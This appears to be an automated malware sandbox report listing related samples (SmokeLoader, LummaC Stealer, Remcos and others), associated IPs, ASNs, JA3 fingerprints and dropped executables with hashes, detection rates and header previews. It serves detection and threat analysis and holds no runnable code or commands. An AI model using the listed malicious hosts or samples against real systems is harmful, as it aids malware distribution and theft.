                                                          7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 162.0.235.84
                                                          mzxn.ruFpiUD4nYpj.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 95.86.30.3
                                                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 211.40.39.251
                                                          EA17eA1pkG.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 179.27.75.59
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 109.175.29.39
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 186.145.236.93
                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 211.181.24.133
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 186.145.236.93
                                                          store4.gofile.ioFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 31.14.70.245
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 31.14.70.245
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 31.14.70.245
                                                          7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 31.14.70.245
                                                          w85VkFOxiD.exeGet hashmaliciousPython Stealer, CStealer, NiceRAT, QuasarBrowse
                                                          • 31.14.70.245
                                                          9afaXJv52z.exeGet hashmaliciousExela StealerBrowse
                                                          • 31.14.70.245
                                                          NoBackend.exeGet hashmaliciousUnknownBrowse
                                                          • 31.14.70.245
                                                          Microsoft_Teams_SC.ba#.batGet hashmaliciousUnknownBrowse
                                                          • 31.14.70.245
                                                          c0PZAXHMCpdh5F1.exeGet hashmaliciousClipboard Hijacker, Redline Clipper, StealeriumBrowse
                                                          • 31.14.70.245
                                                          5a7TEjoYQp.exeGet hashmaliciousXmrigBrowse
                                                          • 31.14.70.245

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUShttps://www.canva.com/design/DAGMDp-pdRs/DFmIVehjt-ABqDbwZmCQ6Q/view?utm_content=DAGMDp-pdRs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.11.207
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.102
                                                          Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.189.102
                                                          Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 172.67.189.102
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.102
                                                          QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                                                          • 172.67.19.24
                                                          41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                          • 172.67.189.102
                                                          Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          INFOBOX-ASInfoboxruAutonomousSystemRUFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 77.221.157.163
                                                          EA17eA1pkG.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 77.221.157.163
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 77.221.157.163
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 77.221.157.163
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 109.120.137.52
                                                          s6K4JjTwtz.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 109.120.176.41
                                                          IrJIw2lsaB.msiGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 109.120.176.41
                                                          ptuNVk3HeK.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 109.120.176.41
                                                          Qnwce6AQX2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 109.120.176.41
                                                          cLi4FZejpP.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 109.120.176.41
                                                          AS-COLOCROSSINGUScreatedthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.168.45.34
                                                          createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 198.46.176.133
                                                          screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 192.3.101.142
                                                          creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                                          • 198.46.176.133
                                                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.137
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.137
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 107.173.160.137
                                                          jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                          • 23.94.183.150
                                                          WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                                          • 104.168.36.68
                                                          172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 192.3.101.142
                                                          CLOUDFLARENETUShttps://www.canva.com/design/DAGMDp-pdRs/DFmIVehjt-ABqDbwZmCQ6Q/view?utm_content=DAGMDp-pdRs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.11.207
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.102
                                                          Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.189.102
                                                          Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 172.67.189.102
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.189.102
                                                          QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                                                          • 172.67.19.24
                                                          41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                          • 172.67.189.102
                                                          Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.65.79
                                                          AS-COLOCROSSINGUScreatedthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.168.45.34
                                                          createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 198.46.176.133
                                                          screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 192.3.101.142
                                                          creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                                          • 198.46.176.133
                                                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.137
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.137
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 107.173.160.137
                                                          jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                          • 23.94.183.150
                                                          WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                                          • 104.168.36.68
                                                          172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 192.3.101.142

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          a6c95ef2da5b759f65c60665167952eeFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          win.exeGet hashmaliciousUnknownBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          win.exeGet hashmaliciousUnknownBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 107.173.160.139
                                                          • 107.173.160.137
                                                          • 167.235.128.153
                                                          3b5074b1b5d032e5620f69f9f700ff0ecreatedthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 104.26.3.16
                                                          • 31.14.70.245
                                                          a0e9f5d64349fb13191bc781f81f42e1rwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          github_softwares_v1.18.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84
                                                          file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                          • 188.114.97.3
                                                          • 185.149.100.242
                                                          • 162.0.235.84

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\6267.exeFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                            e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    C:\Users\user\AppData\Local\Temp\60FC.exeFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                      e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                          7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6BC6.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):1515
                                                                              Entropy (8bit):5.3602768626210215
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                              MD5:366F3274873188864F1C9DC2A155FE99
                                                                              SHA1:DC6D430ADC2BF68980D60D32832F937A19002970
                                                                              SHA-256:942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
                                                                              SHA-512:1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                              C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:JSON data
                                                                              Category:modified
                                                                              Size (bytes):1019
                                                                              Entropy (8bit):5.236946495216897
                                                                              Encrypted:false
                                                                              SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                              MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                              SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                              SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                              SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                              Malicious:false
                                                                              Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1472
                                                                              Entropy (8bit):5.317066265923636
                                                                              Encrypted:false
                                                                              SSDEEP:24:3NiUSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUN0r8HT9ILAl/:wUSU4y4RQmFoUeCamfm9qr9tK8NfUN00
                                                                              MD5:246572B443014E4BFF281FACF7ACE277
                                                                              SHA1:CE1678CB3EDF7C9BD0C4552F87FF7DA600EE418A
                                                                              SHA-256:ABE0240E3E62A3399C02EF7AAE8025E83A98F954A10FDF91F092A6B9896DB280
                                                                              SHA-512:AC03C860BEA48CB32790EDA5DCFB6861455E7B457F061AE9673F58780F6F117DE9D3CF5F372FE379CB75EF80C5D5F86D8F94D356B7CE68B8647E25D3AF5A27DE
                                                                              Malicious:false
                                                                              Preview:@...e...........+.....................,..............@..........@...............|.jdY\.H.s9.!..|*.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                              C:\Users\user\AppData\Local\Temp\60FC.exe

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11672576
                                                                              Entropy (8bit):6.48028581980635
                                                                              Encrypted:false
                                                                              SSDEEP:98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
                                                                              MD5:D3785ED170CDB1F4784D3DFF3A61DAE0
                                                                              SHA1:4BB2D65976DB66FC918C354AA4B2D1162B2420BA
                                                                              SHA-256:505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
                                                                              SHA-512:3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\60FC.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                              • Antivirus: Virustotal, Detection: 71%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: FpiUD4nYpj.exe, Detection: malicious, Browse
                                                                              • Filename: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: 7Y18r(14).exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\6267.exe

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):988672
                                                                              Entropy (8bit):7.331838963074561
                                                                              Encrypted:false
                                                                              SSDEEP:24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
                                                                              MD5:2B3ECC21382E825D6FE0812A717717EB
                                                                              SHA1:F3386531F7726A4F673003BF6CB5806843B76FFB
                                                                              SHA-256:AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
                                                                              SHA-512:7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                              • Antivirus: Virustotal, Detection: 72%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: FpiUD4nYpj.exe, Detection: malicious, Browse
                                                                              • Filename: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: 7Y18r(14).exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\6BC6.exe

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):141944
                                                                              Entropy (8bit):5.653169478479977
                                                                              Encrypted:false
                                                                              SSDEEP:1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
                                                                              MD5:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                              SHA1:32154E9BDCD0975A4095A88B68834E2DA21412DD
                                                                              SHA-256:4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
                                                                              SHA-512:80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..........*........*J.(.....(....}....*.0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z*..{....o....,.rs..ps....z..}....*...0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(....*.s....t....*..0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........*V.(......}......}....*...0..........

                                                                              C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):338427
                                                                              Entropy (8bit):7.999421481430211
                                                                              Encrypted:true
                                                                              SSDEEP:6144:NGuYnZvCloK9BLa2VS1T6dH5IxUt/eiFLj//4RLu7HuayKy8R5spw0:EuYhClokzVjdyx6Tj/gRsHpyKy8wS0
                                                                              MD5:CCC6A76DAC238257CF8CFFE352B3E5C4
                                                                              SHA1:B2705A5A08E1FAA0E4D3097F79EA9FD09C8189FA
                                                                              SHA-256:3C2768836296463361FFBC8F105F713B1059EA6F22C3272FFB9C77D41CA86024
                                                                              SHA-512:611628A9D2F81012A04F6B5E8A43C111ACF7DB1FED3042A4609A7FC8F6591775E013580A73F621B96F81D8B3C831F0698D7070451B6332E3076041C04097F42A
                                                                              Malicious:false
